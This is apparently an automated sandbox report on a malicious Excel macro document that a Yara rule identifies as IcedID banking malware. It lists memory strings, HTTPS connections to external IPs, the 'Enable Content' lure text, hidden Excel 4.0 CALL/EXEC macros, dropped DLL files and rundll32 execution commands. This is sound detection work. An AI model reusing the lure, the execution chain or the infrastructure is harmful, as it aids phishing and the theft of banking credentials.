Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/id/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/id/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/it/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/it/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/jp/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/jp/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2110327677.00000000000F8000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/k
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ko/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ko/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_mo
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_ql_mp
Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/marketplace?aws=hp
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/podcasts/aws-podcast/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/privacy/?nc1=f_pr
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/pt/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/pt/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ru/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ru/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/search
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/search/
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/search/?searchQuery=
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/terms/?nc1=f_pr
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/th/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/th/?nc1=f_ls
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/tr/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/tr/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/tw/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/tw/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/vi/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/vi/?nc1=f_ls
Source: rundll32.exe, 00000003.00000003.2346923026.00000000000D8000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/wzx4
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/?nc2=h_m_mc
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/billing/home?nc2=h_m_bc
Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/console/home
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/console/home?nc1=f_ct&src=footer-signin-mobile
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credential
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/support/home/?nc1=f_dr
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/support/home/?nc2=h_ql_cu
Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/support/home?nc2=h_ql_cu
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://d1.awsstatic.com
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=3038&fmt=gif
Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://devices.amazonaws.com?hp=tile&so-exp=below
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://docs.aws.amazon.com/index.html?nc2=h_ql_doc
Source: rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://i18n-string.us-west-2.prod.pricing.aws.a2z.com
Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://pages.awscloud.com/AmazonECSAnywherePreview.html?hp=tile&so-exp=below
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: https://pages.awscloud.com/communication-preferences?trk=homepage
Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://pages.awscloud.com/fico-case-study.html?hp=tile&story=fico
Source: rundll32.exe, 00000003.00000003.2110269066.0000000002C01000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://pages.awscloud.com/zillow-case-study?hp=tile&story=zllw
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://phd.aws.amazon.com/?nc2=h_m_sc
Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default
Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default&sc_icampaign=
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&src=default
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&src=default
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/manageYourAccount?nc2=h_m_ma
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: https://press.aboutamazon.com/press-releases/aws
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://s0.awsstatic.com
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.html
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.html
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/awscloud
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: https://www.amazon.jobs/aws
Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: https://www.twitch.tv/aws
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com/user/AmazonWebServices/Cloud/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443

Source: unknown	HTTPS traffic detected: 192.185.48.186:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.185.214.87:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.87.146.86:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.79.62.99:443 -> 192.168.2.22:49172 version: TLS 1.2

E-Banking Fraud:

Yara detected IcedID

Source: Yara match	File source: 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2340656783.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2347303586.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2353273837.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2346946398.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324539894.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324305529.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2313180906.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2353071481.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2312959484.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2294844286.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2347372775.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2307293375.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324432561.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2312752671.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2300737619.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2359025585.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2288787523.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2300503265.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2358776145.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2359409712.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2353386032.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2359132350.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2318924371.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2306619325.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2306955212.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2300848573.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2318582057.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2318854529.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2289125454.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2307060040.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2499534316.00000000000DD000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2353251472.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2313048515.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2318832417.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2294985377.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2289046679.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324458781.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2347597509.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2295056636.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2294958860.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2289433187.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2341036692.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2301147013.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2340962857.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2864, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2316, type: MEMORY

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, please elk 14 Ru
Source: Screenshot number: 8	Screenshot OCR: Enable Editing, please click Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18
Source: Screenshot number: 8	Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
Source: Document image extraction number: 9	Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
Source: Document image extraction number: 9	Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Document image extraction number: 15	Screenshot OCR: Enable Editing from the yellow bar above CB Once You have Enable Editing, please click Enable Cont
Source: Document image extraction number: 15	Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? W You are using IDS or And
Source: Screenshot number: 12	Screenshot OCR: Enable Editing 11 1 from the yellow bar above 12 13 ' @ Once You have Enable Editing, please clic
Source: Screenshot number: 12	Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU

Found Excel 4.0 Macro with suspicious formulas

Source: document-1251000362.xlsm	Initial sample: CALL
Source: document-1251000362.xlsm	Initial sample: EXEC

Found abnormal large hidden Excel 4.0 Macro sheet

Source: document-1251000362.xlsm

Initial sample: Sheet size: 36917

Office process drops PE file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3003[1].gif	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3003[1].gif	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\ksjvoefv.skd	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\ksjvoefv.skd3	Jump to dropped file

Contains functionality to call native functions

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_003B13B8 NtQuerySystemInformation,RtlAllocateHeap,		3_2_003B13B8
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_002B13B8 NtQuerySystemInformation,RtlAllocateHeap,		7_2_002B13B8

Detected potential crypto function

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_003B1100	3_2_003B1100
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000007FEF40E1000	3_2_000007FEF40E1000
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000007FEF40E1979	3_2_000007FEF40E1979
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000007FEF40E1610	3_2_000007FEF40E1610
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_002B1100	7_2_002B1100
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000007FEF46AF93A	7_2_000007FEF46AF93A

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSM@11/20@871/6

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$document-1251000362.xlsm

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRCCD0.tmp

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd,DllRegisterServer

Source: document-1251000362.xlsm

Metadefender: Detection: 13%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd1,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd2,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd3,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd4,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd,DllRegisterServer	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd1,DllRegisterServer	Jump to behavior
